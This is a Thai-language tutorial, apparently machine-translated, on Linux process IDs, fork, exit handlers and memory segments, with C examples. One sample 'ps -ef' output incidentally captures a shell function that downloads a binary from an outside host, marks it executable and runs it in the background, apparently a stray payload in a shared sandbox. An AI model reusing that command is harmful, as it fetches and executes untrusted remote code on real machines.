การสื่อสารระหว่างกระบวนการ - คู่มือฉบับย่อ

Inter Process Communication (IPC) เป็นกลไกที่เกี่ยวข้องกับการสื่อสารของกระบวนการหนึ่งกับอีกกระบวนการหนึ่ง สิ่งนี้มักเกิดขึ้นในระบบเดียวเท่านั้น

การสื่อสารมีสองประเภท -

  • ระหว่างกระบวนการที่เกี่ยวข้องที่เริ่มต้นจากกระบวนการเดียวเช่นกระบวนการแม่และลูก

  • ระหว่างกระบวนการที่ไม่เกี่ยวข้องกันหรือสองกระบวนการหรือมากกว่านั้น

ต่อไปนี้เป็นคำศัพท์สำคัญที่เราต้องรู้ก่อนดำเนินการต่อในหัวข้อนี้

Pipes- การสื่อสารระหว่างสองกระบวนการที่เกี่ยวข้อง กลไกคือ half duplex หมายถึงกระบวนการแรกสื่อสารกับกระบวนการที่สอง เพื่อให้ได้ฟูลดูเพล็กซ์กล่าวคือสำหรับกระบวนการที่สองในการสื่อสารกับกระบวนการแรกจำเป็นต้องมีท่อ

FIFO- การสื่อสารระหว่างสองกระบวนการที่ไม่เกี่ยวข้องกัน FIFO เป็นฟูลดูเพล็กซ์ซึ่งหมายความว่ากระบวนการแรกสามารถสื่อสารกับกระบวนการที่สองและในทางกลับกันได้ในเวลาเดียวกัน

Message Queues- การสื่อสารระหว่างสองกระบวนการหรือมากกว่าด้วยความจุแบบดูเพล็กซ์เต็ม กระบวนการต่างๆจะสื่อสารกันโดยการโพสต์ข้อความและดึงข้อมูลออกจากคิว เมื่อดึงข้อมูลแล้วข้อความจะไม่อยู่ในคิวอีกต่อไป

Shared Memory- การสื่อสารระหว่างสองกระบวนการหรือมากกว่านั้นทำได้โดยใช้หน่วยความจำร่วมกันระหว่างกระบวนการทั้งหมด หน่วยความจำที่ใช้ร่วมกันจำเป็นต้องได้รับการปกป้องจากกันและกันโดยการซิงโครไนซ์การเข้าถึงกระบวนการทั้งหมด

Semaphores- Semaphores มีไว้สำหรับการซิงโครไนซ์การเข้าถึงกระบวนการต่างๆ เมื่อกระบวนการหนึ่งต้องการเข้าถึงหน่วยความจำ (สำหรับการอ่านหรือเขียน) จำเป็นต้องล็อก (หรือป้องกัน) และปล่อยเมื่อการเข้าถึงถูกลบออก ขั้นตอนนี้จะต้องทำซ้ำทุกขั้นตอนเพื่อรักษาความปลอดภัยของข้อมูล

Signals- สัญญาณเป็นกลไกในการสื่อสารระหว่างกระบวนการต่างๆด้วยวิธีการส่งสัญญาณ ซึ่งหมายความว่ากระบวนการต้นทางจะส่งสัญญาณ (รับรู้ด้วยตัวเลข) และกระบวนการปลายทางจะจัดการตามนั้น

Note - โปรแกรมเกือบทั้งหมดในบทช่วยสอนนี้ใช้การเรียกระบบภายใต้ระบบปฏิบัติการ Linux (ดำเนินการใน Ubuntu)

ก่อนที่เราจะเข้าสู่กระบวนการข้อมูลเราจำเป็นต้องรู้บางสิ่งเช่น -

กระบวนการคืออะไร? กระบวนการคือโปรแกรมในการดำเนินการ

โปรแกรมคืออะไร? โปรแกรมคือไฟล์ที่มีข้อมูลของกระบวนการและวิธีการสร้างระหว่างรันไทม์ เมื่อคุณเริ่มดำเนินการโปรแกรมโปรแกรมจะโหลดลงใน RAM และเริ่มดำเนินการ

แต่ละกระบวนการถูกระบุด้วยจำนวนเต็มบวกที่ไม่ซ้ำกันซึ่งเรียกว่า ID กระบวนการหรือ PID (หมายเลขประจำตัวกระบวนการ) โดยปกติเคอร์เนลจะ จำกัด ID กระบวนการไว้ที่ 32767 ซึ่งสามารถกำหนดค่าได้ เมื่อ ID กระบวนการถึงขีด จำกัด นี้จะถูกรีเซ็ตอีกครั้งซึ่งหลังจากระบบประมวลผลช่วง จากนั้นรหัสกระบวนการที่ไม่ได้ใช้จากตัวนับนั้นจะถูกกำหนดให้กับกระบวนการที่สร้างขึ้นใหม่

การเรียกระบบ getpid () ส่งคืน ID กระบวนการของกระบวนการเรียก

#include <sys/types.h>
#include <unistd.h>

pid_t getpid(void);

การโทรนี้ส่งคืน ID กระบวนการของกระบวนการโทรซึ่งรับประกันว่าจะไม่ซ้ำกัน การโทรนี้ประสบความสำเร็จเสมอและไม่มีการส่งคืนค่าเพื่อระบุข้อผิดพลาด

แต่ละกระบวนการมี ID เฉพาะที่เรียกว่า ID กระบวนการซึ่งใช้ได้ดี แต่ใครเป็นผู้สร้าง? จะรับข้อมูลเกี่ยวกับผู้สร้างได้อย่างไร? กระบวนการผู้สร้างเรียกว่ากระบวนการหลัก รหัสผู้ปกครองหรือ PPID สามารถรับได้จากการโทร getppid ()

การเรียกระบบ getppid () ส่งคืน Parent PID ของกระบวนการเรียก

#include <sys/types.h>
#include <unistd.h>

pid_t getppid(void);

การโทรนี้ส่งคืน ID กระบวนการหลักของกระบวนการโทร การโทรนี้ประสบความสำเร็จเสมอและไม่มีการส่งคืนค่าเพื่อระบุข้อผิดพลาด

ให้เราเข้าใจสิ่งนี้ด้วยตัวอย่างง่ายๆ

ต่อไปนี้เป็นโปรแกรมที่จะทราบ PID และ PPID ของกระบวนการโทร

File name: processinfo.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main() {
   int mypid, myppid;
   printf("Program to know PID and PPID's information\n");
   mypid = getpid();
   myppid = getppid();
   printf("My process ID is %d\n", mypid);
   printf("My parent process ID is %d\n", myppid);
   printf("Cross verification of pid's by executing process commands on shell\n");
   system("ps -ef");
   return 0;
}

ในการคอมไพล์และการทำงานของโปรแกรมข้างต้นต่อไปนี้จะเป็นผลลัพธ์

UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0  2017 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql       101      1  0  2017 ?        00:06:06 /usr/libexec/mysqld 
                                         --basedir = /usr 
                                         --datadir = /var/lib/mysql 
                                         --plugin-dir = /usr/lib64/mysql/plugin 
                                         --user = mysql 
                                         --log-error = /var/log/mariadb/mariadb.log 
                                         --pid-file = /run/mariadb/mariadb.pid 
                                         --socket = /var/lib/mysql/mysql.sock
2868535   96284      0  0 05:23 ?        00:00:00 bash -c download() { 
                                         flag = "false" hsize = 1 
                                         echo -e "GET /$2 HTTP/1.1\nHost: $1\nConnection: close\n\n" | 
                                         openssl s_client -timeout -quiet 
                                         -verify_quiet -connect $1:443 2> /dev/null | tee out | while read line do if [[ "$flag" == "false" ]]     
                                         then 
                                         hsize = $((hsize+$(echo $line | wc -c))) fi if [[ "${line:1:1}" == "" ]]     
                                         then flag = "true"
                                         fi 
                                         echo $hsize > size done tail -c +$(cat size) out > 
                                         $2 rm size out }
                                         ( download my.mixtape.moe mhawum 2>
                                         /dev/null chmod +x mhawum 2>
                                         /dev/null ./mhawum >
                                         /dev/null 2>
                                         /dev/null )&
2868535   96910  96284 99 05:23 ?        00:47:26 ./mhawum
6118874  104116      0  3 05:25 ?        00:00:00 sh -c cd /home/cg/root/6118874; 
                                         timeout 10s javac Puppy.java
6118874  104122 104116  0 05:25 ?        00:00:00 timeout 10s javac Puppy.java
6118874  104123 104122 23 05:25 ?        00:00:00 javac Puppy.java
3787205  104169      0  0 05:25 ?        00:00:00 sh -c cd /home/cg/root/3787205; 
                                         timeout 10s main
3787205  104175 104169  0 05:25 ?        00:00:00 timeout 10s main
3787205  104176 104175  0 05:25 ?        00:00:00 main
3787205  104177 104176  0 05:25 ?        00:00:00 ps -ef
Program to know PID and PPID's information
My process ID is 104176
My parent process ID is 104175
Cross verification of pid's by executing process commands on shell

Note- ระบบฟังก์ชันไลบรารี“ C” () เรียกใช้คำสั่งเชลล์ อาร์กิวเมนต์ที่ส่งไปยัง system () คือคำสั่งที่ดำเนินการบนเชลล์ ในโปรแกรมข้างต้นคำสั่งคือ“ ps” ซึ่งให้สถานะกระบวนการ

ข้อมูลที่สมบูรณ์เกี่ยวกับกระบวนการทำงานทั้งหมดและข้อมูลอื่น ๆ ที่เกี่ยวข้องกับระบบสามารถเข้าถึงได้จากระบบไฟล์ proc ที่มีอยู่ที่ / proc location

ตอนนี้เราได้เห็นวิธีการรับข้อมูลพื้นฐานของกระบวนการและกระบวนการหลักแล้วก็ถึงเวลาดูรายละเอียดของข้อมูลกระบวนการ / โปรแกรม

ภาพกระบวนการคืออะไร? ภาพกระบวนการเป็นไฟล์ปฏิบัติการที่จำเป็นในขณะเรียกใช้โปรแกรม ภาพนี้มักจะมีส่วนต่อไปนี้ -

  • ส่วนรหัสหรือส่วนข้อความ
  • ส่วนข้อมูล
  • กลุ่มกอง
  • ฮีปเซ็กเมนต์

ต่อไปนี้คือการแสดงภาพของภาพกระบวนการ

Code segmentเป็นส่วนหนึ่งของอ็อบเจ็กต์ไฟล์หรือพื้นที่แอดเดรสเสมือนของโปรแกรมที่ประกอบด้วยคำสั่งปฏิบัติการ โดยปกติจะเป็นส่วนข้อมูลแบบอ่านอย่างเดียวและมีขนาดคงที่

กลุ่มข้อมูลมีสองประเภท

  • Initialized
  • Un-initialized

Initialized data segment เป็นส่วนหนึ่งของไฟล์ออบเจ็กต์หรือพื้นที่ที่อยู่เสมือนของโปรแกรมที่ประกอบด้วยตัวแปรคงที่และตัวแปรส่วนกลาง

Un-initialized data segmentเป็นส่วนหนึ่งของไฟล์ออบเจ็กต์หรือพื้นที่ที่อยู่เสมือนของโปรแกรมที่ประกอบด้วยตัวแปรคงที่และตัวแปรส่วนกลางที่ไม่ได้กำหนดค่าเริ่มต้น ส่วนข้อมูลที่ไม่ได้เริ่มต้นเรียกอีกอย่างว่าเซ็กเมนต์ BSS (Block เริ่มต้นโดย Symbol)

Data segmentเป็นแบบอ่าน - เขียนเนื่องจากค่าของตัวแปรสามารถเปลี่ยนแปลงได้ในระหว่างเวลาทำงาน ส่วนนี้ยังมีขนาดคงที่

Stack segmentเป็นพื้นที่หน่วยความจำที่จัดสรรไว้สำหรับตัวแปรอัตโนมัติและพารามิเตอร์ฟังก์ชัน นอกจากนี้ยังจัดเก็บที่อยู่สำหรับส่งคืนขณะเรียกใช้ฟังก์ชัน Stack ใช้กลไก LIFO (Last-In-First-Out) ในการจัดเก็บตัวแปรภายในหรืออัตโนมัติพารามิเตอร์ฟังก์ชันและจัดเก็บที่อยู่ถัดไปหรือที่อยู่ผู้ส่งคืน ที่อยู่สำหรับส่งคืนหมายถึงที่อยู่ที่จะส่งคืนหลังจากเสร็จสิ้นการเรียกใช้ฟังก์ชัน ขนาดเซ็กเมนต์นี้เป็นตัวแปรตามตัวแปรโลคัลพารามิเตอร์ฟังก์ชันและการเรียกใช้ฟังก์ชัน กลุ่มนี้เติบโตจากที่อยู่ที่สูงกว่าไปสู่ที่อยู่ที่ต่ำกว่า

Heap segmentเป็นพื้นที่ของหน่วยความจำที่จัดสรรสำหรับการจัดเก็บหน่วยความจำแบบไดนามิกเช่นสำหรับการเรียก malloc () และ calloc () ขนาดเซ็กเมนต์นี้ยังแปรผันตามการจัดสรรผู้ใช้ กลุ่มนี้เติบโตจากที่อยู่ที่ต่ำกว่าไปสู่ที่อยู่ที่สูงขึ้น

ตอนนี้ให้เราตรวจสอบว่าขนาดเซ็กเมนต์ (ข้อมูลและกลุ่ม bss) แตกต่างกันอย่างไรด้วยโปรแกรมตัวอย่างบางโปรแกรม ทราบขนาดของกลุ่มโดยการดำเนินการคำสั่ง "ขนาด"

โปรแกรมเริ่มต้น

ไฟล์: segment_size1.c

#include<stdio.h>

int main() {
   printf("Hello World\n");
   return 0;
}

ในโปรแกรมต่อไปนี้จะมีการเพิ่มตัวแปรคงที่ที่ไม่ได้กำหนดค่าเริ่มต้น ซึ่งหมายความว่าขนาดเซ็กเมนต์ที่ไม่ได้เริ่มต้น (BSS) จะเพิ่มขึ้น 4 ไบต์Note- ในระบบปฏิบัติการ Linux ขนาดของ int คือ 4 ไบต์ ขนาดของชนิดข้อมูลจำนวนเต็มขึ้นอยู่กับการสนับสนุนคอมไพเลอร์และระบบปฏิบัติการ

ไฟล์: segment_size2.c

#include<stdio.h>

int main() {
   static int mystaticint1;
   printf("Hello World\n");
   return 0;
}

ในโปรแกรมต่อไปนี้จะมีการเพิ่มตัวแปรคงที่เริ่มต้น ซึ่งหมายความว่าขนาดเซ็กเมนต์เริ่มต้น (DATA) จะเพิ่มขึ้น 4 ไบต์

ไฟล์: segment_size3.c

#include<stdio.h>

int main() {
   static int mystaticint1;
   static int mystaticint2 = 100;
   printf("Hello World\n");
   return 0;
}

ในโปรแกรมต่อไปนี้จะมีการเพิ่มตัวแปรโกลบอลเริ่มต้น ซึ่งหมายความว่าขนาดเซ็กเมนต์เริ่มต้น (DATA) จะเพิ่มขึ้น 4 ไบต์

ไฟล์: segment_size4.c

#include<stdio.h>

int myglobalint1 = 500;
int main() {
   static int mystaticint1;
   static int mystaticint2 = 100;
   printf("Hello World\n");
   return 0;
}

ในโปรแกรมต่อไปนี้จะมีการเพิ่มตัวแปรส่วนกลางที่ไม่ได้เริ่มต้น ซึ่งหมายความว่าขนาดเซ็กเมนต์ที่ไม่ได้เริ่มต้น (BSS) จะเพิ่มขึ้น 4 ไบต์

ไฟล์: segment_size5.c

#include<stdio.h>

int myglobalint1 = 500;
int myglobalint2;
int main() {
   static int mystaticint1;
   static int mystaticint2 = 100;
   printf("Hello World\n");
   return 0;
}

ขั้นตอนการดำเนินการ

การรวบรวม

babukrishnam $ gcc segment_size1.c -o segment_size1
babukrishnam $ gcc segment_size2.c -o segment_size2 babukrishnam $ gcc segment_size3.c -o segment_size3
babukrishnam $ gcc segment_size4.c -o segment_size4 babukrishnam $ gcc segment_size5.c -o segment_size5

การดำเนินการ / เอาต์พุต

babukrishnam size segment_size1 segment_size2 segment_size3 segment_size4 segment_size5
   text  data  bss  dec  hex  filename
   878   252    8   1138 472  segment_size1 
   878   252   12   1142 476  segment_size2 
   878   256   12   1146 47a  segment_size3 
   878   260   12   1150 47e  segment_size4 
   878   260   16   1154 482  segment_size5
babukrishnam

จนถึงตอนนี้เรารู้แล้วว่าเมื่อใดก็ตามที่เรารันโปรแกรมกระบวนการจะถูกสร้างขึ้นและจะถูกยุติหลังจากการดำเนินการเสร็จสิ้น จะเกิดอะไรขึ้นถ้าเราต้องการสร้างกระบวนการภายในโปรแกรมและอาจต้องการกำหนดเวลางานอื่นสำหรับมัน สามารถทำได้หรือไม่? ใช่แน่นอนผ่านการสร้างกระบวนการ แน่นอนว่าหลังจากงานเสร็จแล้วงานจะถูกยกเลิกโดยอัตโนมัติหรือคุณสามารถเลิกจ้างได้ตามต้องการ

การสร้างกระบวนการทำได้โดยใช้ไฟล์ fork() system call. กระบวนการที่สร้างขึ้นใหม่เรียกว่ากระบวนการลูกและกระบวนการที่เริ่มต้น (หรือกระบวนการเมื่อการดำเนินการเริ่มต้น) เรียกว่ากระบวนการหลัก หลังจากการเรียกระบบ fork () ตอนนี้เรามีสองกระบวนการ - กระบวนการแม่และลูก จะแยกความแตกต่างได้อย่างไร? ง่ายมากคือผ่านค่าที่ส่งคืน

หลังจากสร้างกระบวนการย่อยแล้วให้เราดูรายละเอียดการเรียกระบบ fork ()

#include <sys/types.h>
#include <unistd.h>

pid_t fork(void);

สร้างกระบวนการย่อย หลังจากการเรียกนี้มีสองกระบวนการกระบวนการที่มีอยู่เรียกว่ากระบวนการหลักและกระบวนการที่สร้างขึ้นใหม่เรียกว่ากระบวนการลูก

การเรียกระบบ fork () ส่งคืนค่าใดค่าหนึ่งจากสามค่า -

  • ค่าติดลบเพื่อระบุข้อผิดพลาดกล่าวคือไม่สำเร็จในการสร้างกระบวนการย่อย

  • ส่งคืนค่าศูนย์สำหรับกระบวนการย่อย

  • ส่งคืนค่าบวกสำหรับกระบวนการพาเรนต์ ค่านี้เป็นรหัสกระบวนการของกระบวนการลูกที่สร้างขึ้นใหม่

ให้เราพิจารณาโปรแกรมง่ายๆ

File name: basicfork.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main() {
   fork();
   printf("Called fork() system call\n");
   return 0;
}

ขั้นตอนการดำเนินการ

การรวบรวม

gcc basicfork.c -o basicfork

การดำเนินการ / เอาต์พุต

Called fork() system call
Called fork() system call

Note- โดยปกติหลังจากการเรียก fork () กระบวนการย่อยและกระบวนการหลักจะทำงานต่างกัน หากจำเป็นต้องรันงานเดียวกันดังนั้นสำหรับแต่ละ fork () การเรียกใช้จะรัน 2 power n ครั้งโดยที่n คือจำนวนครั้งที่มีการเรียกใช้ fork ()

ในกรณีข้างต้นจะเรียก fork () หนึ่งครั้งดังนั้นเอาต์พุตจะถูกพิมพ์สองครั้ง (2 พาวเวอร์ 1) ถ้ามีการเรียก fork () ให้พูด 3 ครั้งผลลัพธ์จะถูกพิมพ์ 8 ครั้ง (2 ยก 3) ถ้ามันถูกเรียก 5 ครั้งก็จะพิมพ์ 32 ครั้งไปเรื่อย ๆ

เมื่อเห็น fork () สร้างกระบวนการย่อยแล้วก็ถึงเวลาดูรายละเอียดของพาเรนต์และโปรเซสย่อย

ชื่อไฟล์: pids_after_fork.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main() {
   pid_t pid, mypid, myppid;
   pid = getpid();
   printf("Before fork: Process id is %d\n", pid);
   pid = fork();

   if (pid < 0) {
      perror("fork() failure\n");
      return 1;
   }

   // Child process
   if (pid == 0) {
      printf("This is child process\n");
      mypid = getpid();
      myppid = getppid();
      printf("Process id is %d and PPID is %d\n", mypid, myppid);
   } else { // Parent process 
      sleep(2);
      printf("This is parent process\n");
      mypid = getpid();
      myppid = getppid();
      printf("Process id is %d and PPID is %d\n", mypid, myppid);
      printf("Newly created process id or child pid is %d\n", pid);
   }
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

Before fork: Process id is 166629
This is child process
Process id is 166630 and PPID is 166629
Before fork: Process id is 166629
This is parent process
Process id is 166629 and PPID is 166628
Newly created process id or child pid is 166630

กระบวนการสามารถยุติได้ด้วยสองวิธี -

  • ผิดปกติเกิดขึ้นเมื่อส่งสัญญาณบางอย่างพูดว่ายุติสัญญาณ

  • โดยปกติใช้ _exit () การเรียกระบบ (หรือ _Exit () การเรียกระบบ) หรือฟังก์ชันไลบรารี exit ()

ความแตกต่างระหว่าง _exit () และ exit () ส่วนใหญ่เป็นกิจกรรมการล้างข้อมูล exit() ทำการล้างข้อมูลก่อนที่จะส่งคืนคอนโทรลกลับไปที่เคอร์เนลในขณะที่ไฟล์ _exit() (หรือ _Exit ()) จะส่งคืนการควบคุมกลับไปที่เคอร์เนลทันที

พิจารณาโปรแกรมตัวอย่างต่อไปนี้ด้วย exit ()

ชื่อไฟล์: atexit_sample.c

#include <stdio.h>
#include <stdlib.h>

void exitfunc() {
   printf("Called cleanup function - exitfunc()\n");
   return;
}

int main() {
   atexit(exitfunc);
   printf("Hello, World!\n");
   exit (0);
}

ขั้นตอนการรวบรวมและดำเนินการ

Hello, World!
Called cleanup function - exitfunc()

พิจารณาโปรแกรมตัวอย่างต่อไปนี้ด้วย _exit ()

ชื่อไฟล์: at_exit_sample.c

#include <stdio.h>
#include <unistd.h>

void exitfunc() {
   printf("Called cleanup function - exitfunc()\n");
   return;
}

int main() {
   atexit(exitfunc);
   printf("Hello, World!\n");
   _exit (0);
}

ขั้นตอนการรวบรวมและดำเนินการ

Hello, World!

ดังที่เราได้เห็นเมื่อใดก็ตามที่เราสร้างกระบวนการย่อยจากโปรแกรมโดยใช้ส้อมสิ่งต่อไปนี้จะเกิดขึ้น -

  • กระบวนการปัจจุบันกลายเป็นกระบวนการหลัก
  • กระบวนการใหม่กลายเป็นกระบวนการย่อย

จะเกิดอะไรขึ้นถ้ากระบวนการพาเรนต์ทำงานเสร็จเร็วกว่ากระบวนการย่อยแล้วเลิกหรือออก ตอนนี้ใครจะเป็นผู้ปกครองของกระบวนการย่อย? พาเรนต์ของกระบวนการย่อยคือกระบวนการเริ่มต้นซึ่งเป็นกระบวนการแรกที่เริ่มต้นงานทั้งหมด

ในการตรวจสอบสถานะการดำเนินการของกระบวนการลูกเพื่อตรวจสอบว่ากระบวนการลูกกำลังทำงานหรือหยุดทำงานหรือเพื่อตรวจสอบสถานะการดำเนินการ ฯลฯ ระบบจะใช้การเรียกใช้ wait () และตัวแปรต่างๆ

ให้เราพิจารณาโปรแกรมตัวอย่างโดยที่กระบวนการพาเรนต์ไม่รอให้โปรเซสลูกซึ่งส่งผลให้กระบวนการเริ่มกลายเป็นพาเรนต์ใหม่สำหรับโปรเซสลูก

ชื่อไฟล์: parentprocess_nowait.c

#include<stdio.h>

int main() {
   int pid;
   pid = fork();
   
   // Child process
   if (pid == 0) {
      system("ps -ef");
      sleep(10);
      system("ps -ef");
   } else {
      sleep(3);
   }
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan20 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql       101      1  0 Jan20 ?        00:04:41 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mariadb/mariadb.log --pid-file=/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
3108506    5445      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328    5446      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   21894      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   21895      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   27309      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   27311      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
8295652   32407      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
4688328   49830      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
3108506   50854      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
4688328   64936      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
3108506   64937      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   67563      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
5942779   68128      0  0 Jan22 ?        00:00:07 /sbin/klogd -c 1 -x -x
3108506   68238      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   68999      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
3108506   69212      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   74090      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   74091      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328   74298      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   74299      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
6327201   74901      0  0 Jan20 ?        00:00:38 /sbin/klogd -c 1 -x -x
6327201   77274      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   78621      0  0 Jan20 ?        00:00:33 /sbin/klogd -c 1 -x -x
7528790   80536      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
6327201   80542      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
4688328   82050      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
3108506   82051      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
7528790   84116      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   84136      0 19 Jan20 ?        21:13:38 /sbin/klogd -c 1 -x -x
7528790   84140      0  0 Jan20 ?        00:00:28 /sbin/klogd -c 1 -x -x
3108506   84395      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84396      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84397      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
3108506   84928      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84929      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84930      0  0 Jan22 ?        00:00:30 [/sbin/klogd -c ] <defunct>
7528790   84970      0  0 Jan20 ?        00:00:34 /sbin/klogd -c 1 -x -x
3108506   85787      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   85789      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86368      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86402      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   87027      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
7528790   87629      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
7528790   87719      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
4688328   88138      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   88140      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   89353      0 99 Jan22 ?        2-07:35:14 /sbin/klogd -c 1 -x -x
5942779   91836      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328  125358      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  125359      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328  127456      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  127457      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
8023807  163891      0  0 05:41 ?        00:00:00 main
8023807  164130      0  0 05:41 ?        00:00:00 sh -c cd /home/cg/root/8023807; timeout 10s main
8023807  164136 164130  0 05:41 ?        00:00:00 timeout 10s main
8023807  164137 164136  0 05:41 ?        00:00:00 main
8023807  164138 164137  0 05:41 ?        00:00:00 main
8023807  164139 164138  0 05:41 ?        00:00:00 ps -ef
UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan20 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql       101      1  0 Jan20 ?        00:04:41 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mariadb/mariadb.log --pid-file=/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
3108506    5445      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328    5446      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   21894      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   21895      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   27309      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   27311      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
8295652   32407      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
4688328   49830      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
3108506   50854      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
4688328   64936      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
3108506   64937      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   67563      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
5942779   68128      0  0 Jan22 ?        00:00:07 /sbin/klogd -c 1 -x -x
3108506   68238      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   68999      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
3108506   69212      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   74090      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   74091      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328   74298      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   74299      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
6327201   74901      0  0 Jan20 ?        00:00:38 /sbin/klogd -c 1 -x -x
6327201   77274      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   78621      0  0 Jan20 ?        00:00:33 /sbin/klogd -c 1 -x -x
7528790   80536      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
6327201   80542      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
4688328   82050      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
3108506   82051      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
7528790   84116      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   84136      0 19 Jan20 ?        21:13:48 /sbin/klogd -c 1 -x -x
7528790   84140      0  0 Jan20 ?        00:00:28 /sbin/klogd -c 1 -x -x
3108506   84395      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84396      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84397      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
3108506   84928      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84929      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84930      0  0 Jan22 ?        00:00:30 [/sbin/klogd -c ] <defunct>
7528790   84970      0  0 Jan20 ?        00:00:34 /sbin/klogd -c 1 -x -x
3108506   85787      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
